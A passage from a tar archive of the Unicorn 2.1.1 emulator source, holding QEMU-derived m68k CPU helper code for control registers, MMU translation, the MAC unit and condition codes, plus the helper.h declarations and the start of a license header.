M68K_CR_ITT1: env->mmu.ttr[M68K_ITTR1] = val; return; case M68K_CR_DTT0: env->mmu.ttr[M68K_DTTR0] = val; return; case M68K_CR_DTT1: env->mmu.ttr[M68K_DTTR1] = val; return; } cpu_abort(env_cpu(env), "Unimplemented control register write 0x%x = 0x%x\n", reg, val); } uint32_t HELPER(m68k_movec_from)(CPUM68KState *env, uint32_t reg) { switch (reg) { /* MC680[1234]0 */ case M68K_CR_SFC: return env->sfc; case M68K_CR_DFC: return env->dfc; case M68K_CR_VBR: return env->vbr; /* MC680[234]0 */ case M68K_CR_CACR: return env->cacr; /* MC680[34]0 */ case M68K_CR_TC: return env->mmu.tcr; case M68K_CR_MMUSR: return env->mmu.mmusr; case M68K_CR_SRP: return env->mmu.srp; case M68K_CR_USP: return env->sp[M68K_USP]; case M68K_CR_MSP: return env->sp[M68K_SSP]; case M68K_CR_ISP: return env->sp[M68K_ISP]; /* MC68040/MC68LC040 */ case M68K_CR_URP: return env->mmu.urp; case M68K_CR_ITT0: return env->mmu.ttr[M68K_ITTR0]; case M68K_CR_ITT1: return env->mmu.ttr[M68K_ITTR1]; case M68K_CR_DTT0: return env->mmu.ttr[M68K_DTTR0]; case M68K_CR_DTT1: return env->mmu.ttr[M68K_DTTR1]; } cpu_abort(env_cpu(env), "Unimplemented control register read 0x%x\n", reg); } void HELPER(set_macsr)(CPUM68KState *env, uint32_t val) { uint32_t acc; int8_t exthigh; uint8_t extlow; uint64_t regval; int i; if ((env->macsr ^ val) & (MACSR_FI | MACSR_SU)) { for (i = 0; i < 4; i++) { regval = env->macc[i]; exthigh = regval >> 40; if (env->macsr & MACSR_FI) { acc = regval >> 8; extlow = regval; } else { acc = regval; extlow = regval >> 32; } if (env->macsr & MACSR_FI) { regval = (((uint64_t)acc) << 8) | extlow; regval |= ((int64_t)exthigh) << 40; } else if (env->macsr & MACSR_SU) { regval = acc | (((int64_t)extlow) << 32); regval |= ((int64_t)exthigh) << 40; } else { regval = acc | (((uint64_t)extlow) << 32); regval |= ((uint64_t)(uint8_t)exthigh) << 40; } env->macc[i] = regval; } } env->macsr = val; } void m68k_switch_sp(CPUM68KState *env) { int new_sp; env->sp[env->current_sp] = env->aregs[7]; if (m68k_feature(env, M68K_FEATURE_M68000)) { if (env->sr & SR_S) { if (env->sr & SR_M) { new_sp = M68K_SSP; } else { new_sp = M68K_ISP; } } else { new_sp = M68K_USP; } } else { new_sp = (env->sr & SR_S && env->cacr & M68K_CACR_EUSP) ? M68K_SSP : M68K_USP; } env->aregs[7] = env->sp[new_sp]; env->current_sp = new_sp; } static int check_TTR(uint32_t ttr, int *prot, target_ulong addr, int access_type) { uint32_t base, mask; /* check if transparent translation is enabled */ if ((ttr & M68K_TTR_ENABLED) == 0) { return 0; } /* check mode access */ switch (ttr & M68K_TTR_SFIELD) { case M68K_TTR_SFIELD_USER: /* match only if user */ if ((access_type & ACCESS_SUPER) != 0) { return 0; } break; case M68K_TTR_SFIELD_SUPER: /* match only if supervisor */ if ((access_type & ACCESS_SUPER) == 0) { return 0; } break; default: /* all other values disable mode matching (FC2) */ break; } /* check address matching */ base = ttr & M68K_TTR_ADDR_BASE; mask = (ttr & M68K_TTR_ADDR_MASK) ^ M68K_TTR_ADDR_MASK; mask <<= M68K_TTR_ADDR_MASK_SHIFT; if ((addr & mask) != (base & mask)) { return 0; } *prot = PAGE_READ | PAGE_EXEC; if ((ttr & M68K_DESC_WRITEPROT) == 0) { *prot |= PAGE_WRITE; } return 1; } static int get_physical_address(CPUM68KState *env, hwaddr *physical, int *prot, target_ulong address, int access_type, target_ulong *page_size) { CPUState *cs = env_cpu(env); uint32_t entry; uint32_t next; target_ulong page_mask; bool debug = access_type & ACCESS_DEBUG; int page_bits; int i; MemTxResult txres; /* Transparent Translation (physical = logical) */ for (i = 0; i < M68K_MAX_TTR; i++) { if (check_TTR(env->mmu.TTR(access_type, i), prot, address, access_type)) { if (access_type & ACCESS_PTEST) { /* Transparent Translation Register bit */ env->mmu.mmusr = M68K_MMU_T_040 | M68K_MMU_R_040; } *physical = address & TARGET_PAGE_MASK; *page_size = TARGET_PAGE_SIZE; return 0; } } /* Page Table Root Pointer */ *prot = PAGE_READ | PAGE_WRITE; if (access_type & ACCESS_CODE) { *prot |= PAGE_EXEC; } if (access_type & ACCESS_SUPER) { next = env->mmu.srp; } else { next = env->mmu.urp; } /* Root Index */ entry = M68K_POINTER_BASE(next) | M68K_ROOT_INDEX(address); next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } if (!M68K_UDT_VALID(next)) { return -1; } if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } if (next & M68K_DESC_WRITEPROT) { if (access_type & ACCESS_PTEST) { env->mmu.mmusr |= M68K_MMU_WP_040; } *prot &= ~PAGE_WRITE; if (access_type & ACCESS_STORE) { return -1; } } /* Pointer Index */ entry = M68K_POINTER_BASE(next) | M68K_POINTER_INDEX(address); next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } if (!M68K_UDT_VALID(next)) { return -1; } if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } if (next & M68K_DESC_WRITEPROT) { if (access_type & ACCESS_PTEST) { env->mmu.mmusr |= M68K_MMU_WP_040; } *prot &= ~PAGE_WRITE; if (access_type & ACCESS_STORE) { return -1; } } /* Page Index */ if (env->mmu.tcr & M68K_TCR_PAGE_8K) { entry = M68K_8K_PAGE_BASE(next) | M68K_8K_PAGE_INDEX(address); } else { entry = M68K_4K_PAGE_BASE(next) | M68K_4K_PAGE_INDEX(address); } next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } if (!M68K_PDT_VALID(next)) { return -1; } if (M68K_PDT_INDIRECT(next)) { next = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, M68K_INDIRECT_POINTER(next), MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } if (access_type & ACCESS_STORE) { if (next & M68K_DESC_WRITEPROT) { if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } } else if ((next & (M68K_DESC_MODIFIED | M68K_DESC_USED)) != (M68K_DESC_MODIFIED | M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | (M68K_DESC_MODIFIED | M68K_DESC_USED), MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } } else { if (!(next & M68K_DESC_USED) && !debug) { glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, entry, next | M68K_DESC_USED, MEMTXATTRS_UNSPECIFIED, &txres); if (txres != MEMTX_OK) { goto txfail; } } } if (env->mmu.tcr & M68K_TCR_PAGE_8K) { page_bits = 13; } else { page_bits = 12; } *page_size = 1 << page_bits; page_mask = ~(*page_size - 1); *physical = next & page_mask; if (access_type & ACCESS_PTEST) { env->mmu.mmusr |= next & M68K_MMU_SR_MASK_040; env->mmu.mmusr |= *physical & 0xfffff000; env->mmu.mmusr |= M68K_MMU_R_040; } if (next & M68K_DESC_WRITEPROT) { *prot &= ~PAGE_WRITE; if (access_type & ACCESS_STORE) { return -1; } } if (next & M68K_DESC_SUPERONLY) { if ((access_type & ACCESS_SUPER) == 0) { return -1; } } return 0; txfail: /* * A page table load/store failed. TODO: we should really raise a * suitable guest fault here if this is not a debug access. * For now just return that the translation failed. */ return -1; } hwaddr m68k_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; hwaddr phys_addr; int prot; int access_type; target_ulong page_size; if ((env->mmu.tcr & M68K_TCR_ENABLED) == 0) { /* MMU disabled */ return addr; } access_type = ACCESS_DATA | ACCESS_DEBUG; if (env->sr & SR_S) { access_type |= ACCESS_SUPER; } if (get_physical_address(env, &phys_addr, &prot, addr, access_type, &page_size) != 0) { return -1; } return phys_addr; } /* * Notify CPU of a pending interrupt. Prioritization and vectoring should * be handled by the interrupt controller. Real hardware only requests * the vector when the interrupt is acknowledged by the CPU. For * simplicity we calculate it when the interrupt is signalled. */ void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector) { CPUState *cs = CPU(cpu); CPUM68KState *env = &cpu->env; env->pending_level = level; env->pending_vector = vector; if (level) { cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); } } bool m68k_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType qemu_access_type, int mmu_idx, bool probe, uintptr_t retaddr) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; hwaddr physical; int prot; int access_type; int ret; target_ulong page_size; if ((env->mmu.tcr & M68K_TCR_ENABLED) == 0) { /* MMU disabled */ tlb_set_page(cs, address & TARGET_PAGE_MASK, address & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return true; } if (qemu_access_type == MMU_INST_FETCH) { access_type = ACCESS_CODE; } else { access_type = ACCESS_DATA; if (qemu_access_type == MMU_DATA_STORE) { access_type |= ACCESS_STORE; } } if (mmu_idx != MMU_USER_IDX) { access_type |= ACCESS_SUPER; } ret = get_physical_address(&cpu->env, &physical, &prot, address, access_type, &page_size); if (likely(ret == 0)) { address &= TARGET_PAGE_MASK; physical += address & (page_size - 1); tlb_set_page(cs, address, physical, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } if (probe) { return false; } /* page fault */ env->mmu.ssw = M68K_ATC_040; switch (size) { case 1: env->mmu.ssw |= M68K_BA_SIZE_BYTE; break; case 2: env->mmu.ssw |= M68K_BA_SIZE_WORD; break; case 4: env->mmu.ssw |= M68K_BA_SIZE_LONG; break; } if (access_type & ACCESS_SUPER) { env->mmu.ssw |= M68K_TM_040_SUPER; } if (access_type & ACCESS_CODE) { env->mmu.ssw |= M68K_TM_040_CODE; } else { env->mmu.ssw |= M68K_TM_040_DATA; } if (!(access_type & ACCESS_STORE)) { env->mmu.ssw |= M68K_RW_040; } cs->exception_index = EXCP_ACCESS; env->mmu.ar = address; cpu_loop_exit_restore(cs, retaddr); } uint32_t HELPER(bitrev)(uint32_t x) { x = ((x >> 1) & 0x55555555u) | ((x << 1) & 0xaaaaaaaau); x = ((x >> 2) & 0x33333333u) | ((x << 2) & 0xccccccccu); x = ((x >> 4) & 0x0f0f0f0fu) | ((x << 4) & 0xf0f0f0f0u); return bswap32(x); } uint32_t HELPER(ff1)(uint32_t x) { int n; for (n = 32; x; n--) x >>= 1; return n; } uint32_t HELPER(sats)(uint32_t val, uint32_t v) { /* The result has the opposite sign to the original value. */ if ((int32_t)v < 0) { val = (((int32_t)val) >> 31) ^ SIGNBIT; } return val; } void cpu_m68k_set_sr(CPUM68KState *env, uint32_t sr) { env->sr = sr & 0xffe0; cpu_m68k_set_ccr(env, sr); m68k_switch_sp(env); } void HELPER(set_sr)(CPUM68KState *env, uint32_t val) { cpu_m68k_set_sr(env, val); } /* MAC unit. */ /* * FIXME: The MAC unit implementation is a bit of a mess. Some helpers * take values, others take register numbers and manipulate the contents * in-place. */ void HELPER(mac_move)(CPUM68KState *env, uint32_t dest, uint32_t src) { uint32_t mask; env->macc[dest] = env->macc[src]; mask = MACSR_PAV0 << dest; if (env->macsr & (MACSR_PAV0 << src)) env->macsr |= mask; else env->macsr &= ~mask; } uint64_t HELPER(macmuls)(CPUM68KState *env, uint32_t op1, uint32_t op2) { int64_t product; int64_t res; product = (uint64_t)op1 * op2; res = (product << 24) >> 24; if (res != product) { env->macsr |= MACSR_V; if (env->macsr & MACSR_OMC) { /* Make sure the accumulate operation overflows. */ if (product < 0) res = ~(1ll << 50); else res = 1ll << 50; } } return res; } uint64_t HELPER(macmulu)(CPUM68KState *env, uint32_t op1, uint32_t op2) { uint64_t product; product = (uint64_t)op1 * op2; if (product & (0xffffffull << 40)) { env->macsr |= MACSR_V; if (env->macsr & MACSR_OMC) { /* Make sure the accumulate operation overflows. */ product = 1ll << 50; } else { product &= ((1ull << 40) - 1); } } return product; } uint64_t HELPER(macmulf)(CPUM68KState *env, uint32_t op1, uint32_t op2) { uint64_t product; uint32_t remainder; product = (uint64_t)op1 * op2; if (env->macsr & MACSR_RT) { remainder = product & 0xffffff; product >>= 24; if (remainder > 0x800000) product++; else if (remainder == 0x800000) product += (product & 1); } else { product >>= 24; } return product; } void HELPER(macsats)(CPUM68KState *env, uint32_t acc) { int64_t tmp; int64_t result; tmp = env->macc[acc]; result = ((tmp << 16) >> 16); if (result != tmp) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_V) { env->macsr |= MACSR_PAV0 << acc; if (env->macsr & MACSR_OMC) { /* * The result is saturated to 32 bits, despite overflow occurring * at 48 bits. Seems weird, but that's what the hardware docs * say. */ result = (result >> 63) ^ 0x7fffffff; } } env->macc[acc] = result; } void HELPER(macsatu)(CPUM68KState *env, uint32_t acc) { uint64_t val; val = env->macc[acc]; if (val & (0xffffull << 48)) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_V) { env->macsr |= MACSR_PAV0 << acc; if (env->macsr & MACSR_OMC) { if (val > (1ull << 53)) val = 0; else val = (1ull << 48) - 1; } else { val &= ((1ull << 48) - 1); } } env->macc[acc] = val; } void HELPER(macsatf)(CPUM68KState *env, uint32_t acc) { int64_t sum; int64_t result; sum = env->macc[acc]; result = (sum << 16) >> 16; if (result != sum) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_V) { env->macsr |= MACSR_PAV0 << acc; if (env->macsr & MACSR_OMC) { result = (result >> 63) ^ 0x7fffffffffffll; } } env->macc[acc] = result; } void HELPER(mac_set_flags)(CPUM68KState *env, uint32_t acc) { uint64_t val; val = env->macc[acc]; if (val == 0) { env->macsr |= MACSR_Z; } else if (val & (1ull << 47)) { env->macsr |= MACSR_N; } if (env->macsr & (MACSR_PAV0 << acc)) { env->macsr |= MACSR_V; } if (env->macsr & MACSR_FI) { val = ((int64_t)val) >> 40; if (val != 0 && val != -1) env->macsr |= MACSR_EV; } else if (env->macsr & MACSR_SU) { val = ((int64_t)val) >> 32; if (val != 0 && val != -1) env->macsr |= MACSR_EV; } else { if ((val >> 32) != 0) env->macsr |= MACSR_EV; } } #define EXTSIGN(val, index) ( \ (index == 0) ? (int8_t)(val) : ((index == 1) ? (int16_t)(val) : (val)) \ ) #define COMPUTE_CCR(op, x, n, z, v, c) { \ switch (op) { \ case CC_OP_FLAGS: \ /* Everything in place. */ \ break; \ case CC_OP_ADDB: \ case CC_OP_ADDW: \ case CC_OP_ADDL: \ res = n; \ src2 = v; \ src1 = EXTSIGN(res - src2, op - CC_OP_ADDB); \ c = x; \ z = n; \ v = (res ^ src1) & ~(src1 ^ src2); \ break; \ case CC_OP_SUBB: \ case CC_OP_SUBW: \ case CC_OP_SUBL: \ res = n; \ src2 = v; \ src1 = EXTSIGN(res + src2, op - CC_OP_SUBB); \ c = x; \ z = n; \ v = (res ^ src1) & (src1 ^ src2); \ break; \ case CC_OP_CMPB: \ case CC_OP_CMPW: \ case CC_OP_CMPL: \ src1 = n; \ src2 = v; \ res = EXTSIGN(src1 - src2, op - CC_OP_CMPB); \ n = res; \ z = res; \ c = src1 < src2; \ v = (res ^ src1) & (src1 ^ src2); \ break; \ case CC_OP_LOGIC: \ c = v = 0; \ z = n; \ break; \ default: \ cpu_abort(env_cpu(env), "Bad CC_OP %d", op); \ } \ } while (0) uint32_t cpu_m68k_get_ccr(CPUM68KState *env) { uint32_t x, c, n, z, v; uint32_t res, src1, src2; x = env->cc_x; n = env->cc_n; z = env->cc_z; v = env->cc_v; c = env->cc_c; COMPUTE_CCR(env->cc_op, x, n, z, v, c); n = n >> 31; z = (z == 0); v = v >> 31; return x * CCF_X + n * CCF_N + z * CCF_Z + v * CCF_V + c * CCF_C; } uint32_t HELPER(get_ccr)(CPUM68KState *env) { return cpu_m68k_get_ccr(env); } void cpu_m68k_set_ccr(CPUM68KState *env, uint32_t ccr) { env->cc_x = (ccr & CCF_X ? 1 : 0); env->cc_n = (ccr & CCF_N ? -1 : 0); env->cc_z = (ccr & CCF_Z ? 0 : 1); env->cc_v = (ccr & CCF_V ? -1 : 0); env->cc_c = (ccr & CCF_C ? 1 : 0); env->cc_op = CC_OP_FLAGS; } void HELPER(set_ccr)(CPUM68KState *env, uint32_t ccr) { cpu_m68k_set_ccr(env, ccr); } void HELPER(flush_flags)(CPUM68KState *env, uint32_t cc_op) { uint32_t res, src1, src2; COMPUTE_CCR(cc_op, env->cc_x, env->cc_n, env->cc_z, env->cc_v, env->cc_c); env->cc_op = CC_OP_FLAGS; } uint32_t HELPER(get_macf)(CPUM68KState *env, uint64_t val) { int rem; uint32_t result; if (env->macsr & MACSR_SU) { /* 16-bit rounding. */ rem = val & 0xffffff; val = (val >> 24) & 0xffffu; if (rem > 0x800000) val++; else if (rem == 0x800000) val += (val & 1); } else if (env->macsr & MACSR_RT) { /* 32-bit rounding. */ rem = val & 0xff; val >>= 8; if (rem > 0x80) val++; else if (rem == 0x80) val += (val & 1); } else { /* No rounding. */ val >>= 8; } if (env->macsr & MACSR_OMC) { /* Saturate. */ if (env->macsr & MACSR_SU) { if (val != (uint16_t) val) { result = ((val >> 63) ^ 0x7fff) & 0xffff; } else { result = val & 0xffff; } } else { if (val != (uint32_t)val) { result = ((uint32_t)(val >> 63) & 0x7fffffff); } else { result = (uint32_t)val; } } } else { /* No saturation. */ if (env->macsr & MACSR_SU) { result = val & 0xffff; } else { result = (uint32_t)val; } } return result; } uint32_t HELPER(get_macs)(uint64_t val) { if (val == (int32_t)val) { return (int32_t)val; } else { return (val >> 61) ^ ~SIGNBIT; } } uint32_t HELPER(get_macu)(uint64_t val) { if ((val >> 32) == 0) { return (uint32_t)val; } else { return 0xffffffffu; } } uint32_t HELPER(get_mac_extf)(CPUM68KState *env, uint32_t acc) { uint32_t val; val = env->macc[acc] & 0x00ff; val |= (env->macc[acc] >> 32) & 0xff00; val |= (env->macc[acc + 1] << 16) & 0x00ff0000; val |= (env->macc[acc + 1] >> 16) & 0xff000000; return val; } uint32_t HELPER(get_mac_exti)(CPUM68KState *env, uint32_t acc) { uint32_t val; val = (env->macc[acc] >> 32) & 0xffff; val |= (env->macc[acc + 1] >> 16) & 0xffff0000; return val; } void HELPER(set_mac_extf)(CPUM68KState *env, uint32_t val, uint32_t acc) { int64_t res; int32_t tmp; res = env->macc[acc] & 0xffffffff00ull; tmp = (int16_t)(val & 0xff00); res |= ((int64_t)tmp) << 32; res |= val & 0xff; env->macc[acc] = res; res = env->macc[acc + 1] & 0xffffffff00ull; tmp = (val & 0xff000000); res |= ((int64_t)tmp) << 16; res |= (val >> 16) & 0xff; env->macc[acc + 1] = res; } void HELPER(set_mac_exts)(CPUM68KState *env, uint32_t val, uint32_t acc) { int64_t res; int32_t tmp; res = (uint32_t)env->macc[acc]; tmp = (int16_t)val; res |= ((int64_t)tmp) << 32; env->macc[acc] = res; res = (uint32_t)env->macc[acc + 1]; tmp = val & 0xffff0000; res |= (int64_t)tmp << 16; env->macc[acc + 1] = res; } void HELPER(set_mac_extu)(CPUM68KState *env, uint32_t val, uint32_t acc) { uint64_t res; res = (uint32_t)env->macc[acc]; res |= ((uint64_t)(val & 0xffff)) << 32; env->macc[acc] = res; res = (uint32_t)env->macc[acc + 1]; res |= (uint64_t)(val & 0xffff0000) << 16; env->macc[acc + 1] = res; } void HELPER(ptest)(CPUM68KState *env, uint32_t addr, uint32_t is_read) { hwaddr physical; int access_type; int prot; int ret; target_ulong page_size; access_type = ACCESS_PTEST; if (env->dfc & 4) { access_type |= ACCESS_SUPER; } if ((env->dfc & 3) == 2) { access_type |= ACCESS_CODE; } if (!is_read) { access_type |= ACCESS_STORE; } env->mmu.mmusr = 0; env->mmu.ssw = 0; ret = get_physical_address(env, &physical, &prot, addr, access_type, &page_size); if (ret == 0) { addr &= TARGET_PAGE_MASK; physical += addr & (page_size - 1); tlb_set_page(env_cpu(env), addr, physical, prot, access_type & ACCESS_SUPER ? MMU_KERNEL_IDX : MMU_USER_IDX, page_size); } } void HELPER(pflush)(CPUM68KState *env, uint32_t addr, uint32_t opmode) { CPUState *cs = env_cpu(env); switch (opmode) { case 0: /* Flush page entry if not global */ case 1: /* Flush page entry */ tlb_flush_page(cs, addr); break; case 2: /* Flush all except global entries */ tlb_flush(cs); break; case 3: /* Flush all entries */ tlb_flush(cs); break; } } void HELPER(reset)(CPUM68KState *env) { /* FIXME: reset all except CPU */ } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/helper.h�������������������������������������������������������������0000664�0000000�0000000�00000012450�14675241067�0017660�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_1(bitrev, i32, i32) DEF_HELPER_1(ff1, i32, i32) DEF_HELPER_FLAGS_2(sats, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_3(divuw, void, env, int, i32) DEF_HELPER_3(divsw, void, env, int, s32) DEF_HELPER_4(divul, void, env, int, int, i32) DEF_HELPER_4(divsl, void, env, int, int, s32) DEF_HELPER_4(divull, void, env, int, int, i32) DEF_HELPER_4(divsll, void, env, int, int, s32) DEF_HELPER_2(set_sr, void, env, i32) DEF_HELPER_3(cf_movec_to, void, env, i32, i32) DEF_HELPER_3(m68k_movec_to, void, env, i32, i32) DEF_HELPER_2(m68k_movec_from, i32, env, i32) DEF_HELPER_4(cas2w, void, env, i32, i32, i32) DEF_HELPER_4(cas2l, void, env, i32, i32, i32) DEF_HELPER_4(cas2l_parallel, void, env, i32, i32, i32) #define dh_alias_fp ptr #define dh_ctype_fp FPReg * #define dh_is_signed_fp dh_is_signed_ptr DEF_HELPER_3(exts32, void, env, fp, s32) DEF_HELPER_3(extf32, void, env, fp, f32) DEF_HELPER_3(extf64, void, env, fp, f64) DEF_HELPER_2(redf32, f32, env, fp) DEF_HELPER_2(redf64, f64, env, fp) DEF_HELPER_2(reds32, s32, env, fp) DEF_HELPER_3(fsround, void, env, fp, fp) DEF_HELPER_3(fdround, void, env, fp, fp) DEF_HELPER_3(firound, void, env, fp, fp) DEF_HELPER_3(fitrunc, void, env, fp, fp) DEF_HELPER_3(fsqrt, void, env, fp, fp) DEF_HELPER_3(fssqrt, void, env, fp, fp) DEF_HELPER_3(fdsqrt, void, env, fp, fp) DEF_HELPER_3(fabs, void, env, fp, fp) DEF_HELPER_3(fsabs, void, env, fp, fp) DEF_HELPER_3(fdabs, void, env, fp, fp) DEF_HELPER_3(fneg, void, env, fp, fp) DEF_HELPER_3(fsneg, void, env, fp, fp) DEF_HELPER_3(fdneg, void, env, fp, fp) DEF_HELPER_4(fadd, void, env, fp, fp, fp) DEF_HELPER_4(fsadd, void, env, fp, fp, fp) DEF_HELPER_4(fdadd, void, env, fp, fp, fp) DEF_HELPER_4(fsub, void, env, fp, fp, fp) DEF_HELPER_4(fssub, void, env, fp, fp, fp) DEF_HELPER_4(fdsub, void, env, fp, fp, fp) DEF_HELPER_4(fmul, void, env, fp, fp, fp) DEF_HELPER_4(fsmul, void, env, fp, fp, fp) DEF_HELPER_4(fdmul, void, env, fp, fp, fp) DEF_HELPER_4(fsglmul, void, env, fp, fp, fp) DEF_HELPER_4(fdiv, void, env, fp, fp, fp) DEF_HELPER_4(fsdiv, void, env, fp, fp, fp) DEF_HELPER_4(fddiv, void, env, fp, fp, fp) DEF_HELPER_4(fsgldiv, void, env, fp, fp, fp) DEF_HELPER_FLAGS_3(fcmp, TCG_CALL_NO_RWG, void, env, fp, fp) DEF_HELPER_FLAGS_2(set_fpcr, TCG_CALL_NO_RWG, void, env, i32) DEF_HELPER_FLAGS_2(ftst, TCG_CALL_NO_RWG, void, env, fp) DEF_HELPER_3(fconst, void, env, fp, i32) DEF_HELPER_3(fmovemx_st_predec, i32, env, i32, i32) DEF_HELPER_3(fmovemx_st_postinc, i32, env, i32, i32) DEF_HELPER_3(fmovemx_ld_postinc, i32, env, i32, i32) DEF_HELPER_3(fmovemd_st_predec, i32, env, i32, i32) DEF_HELPER_3(fmovemd_st_postinc, i32, env, i32, i32) DEF_HELPER_3(fmovemd_ld_postinc, i32, env, i32, i32) DEF_HELPER_4(fmod, void, env, fp, fp, fp) DEF_HELPER_4(frem, void, env, fp, fp, fp) DEF_HELPER_3(fgetexp, void, env, fp, fp) DEF_HELPER_3(fgetman, void, env, fp, fp) DEF_HELPER_4(fscale, void, env, fp, fp, fp) DEF_HELPER_3(flognp1, void, env, fp, fp) DEF_HELPER_3(flogn, void, env, fp, fp) DEF_HELPER_3(flog10, void, env, fp, fp) DEF_HELPER_3(flog2, void, env, fp, fp) DEF_HELPER_3(fetox, void, env, fp, fp) DEF_HELPER_3(ftwotox, void, env, fp, fp) DEF_HELPER_3(ftentox, void, env, fp, fp) DEF_HELPER_3(ftan, void, env, fp, fp) DEF_HELPER_3(fsin, void, env, fp, fp) DEF_HELPER_3(fcos, void, env, fp, fp) DEF_HELPER_4(fsincos, void, env, fp, fp, fp) DEF_HELPER_3(fatan, void, env, fp, fp) DEF_HELPER_3(fasin, void, env, fp, fp) DEF_HELPER_3(facos, void, env, fp, fp) DEF_HELPER_3(fatanh, void, env, fp, fp) DEF_HELPER_3(ftanh, void, env, fp, fp) DEF_HELPER_3(fsinh, void, env, fp, fp) DEF_HELPER_3(fcosh, void, env, fp, fp) DEF_HELPER_3(mac_move, void, env, i32, i32) DEF_HELPER_3(macmulf, i64, env, i32, i32) DEF_HELPER_3(macmuls, i64, env, i32, i32) DEF_HELPER_3(macmulu, i64, env, i32, i32) DEF_HELPER_2(macsats, void, env, i32) DEF_HELPER_2(macsatu, void, env, i32) DEF_HELPER_2(macsatf, void, env, i32) DEF_HELPER_2(mac_set_flags, void, env, i32) DEF_HELPER_2(set_macsr, void, env, i32) DEF_HELPER_2(get_macf, i32, env, i64) DEF_HELPER_1(get_macs, i32, i64) DEF_HELPER_1(get_macu, i32, i64) DEF_HELPER_2(get_mac_extf, i32, env, i32) DEF_HELPER_2(get_mac_exti, i32, env, i32) DEF_HELPER_3(set_mac_extf, void, env, i32, i32) DEF_HELPER_3(set_mac_exts, void, env, i32, i32) DEF_HELPER_3(set_mac_extu, void, env, i32, i32) DEF_HELPER_2(flush_flags, void, env, i32) DEF_HELPER_2(set_ccr, void, env, i32) DEF_HELPER_FLAGS_1(get_ccr, TCG_CALL_NO_WG_SE, i32, env) DEF_HELPER_2(raise_exception, void, env, i32) DEF_HELPER_FLAGS_3(bfffo_reg, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) DEF_HELPER_FLAGS_4(bfexts_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfextu_mem, TCG_CALL_NO_WG, i64, env, i32, s32, i32) DEF_HELPER_FLAGS_5(bfins_mem, TCG_CALL_NO_WG, i32, env, i32, i32, s32, i32) DEF_HELPER_FLAGS_4(bfchg_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfclr_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfset_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfffo_mem, TCG_CALL_NO_WG, i64, env, i32, s32, i32) DEF_HELPER_3(chk, void, env, s32, s32) DEF_HELPER_4(chk2, void, env, s32, s32, s32) DEF_HELPER_3(ptest, void, env, i32, i32) DEF_HELPER_3(pflush, void, env, i32, i32) DEF_HELPER_FLAGS_1(reset, TCG_CALL_NO_RWG, void, env) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/op_helper.c����������������������������������������������������������0000664�0000000�0000000�00000065705�14675241067�0020364�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * M68K helper routines * * Copyright (c) 2007 CodeSourcery * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * 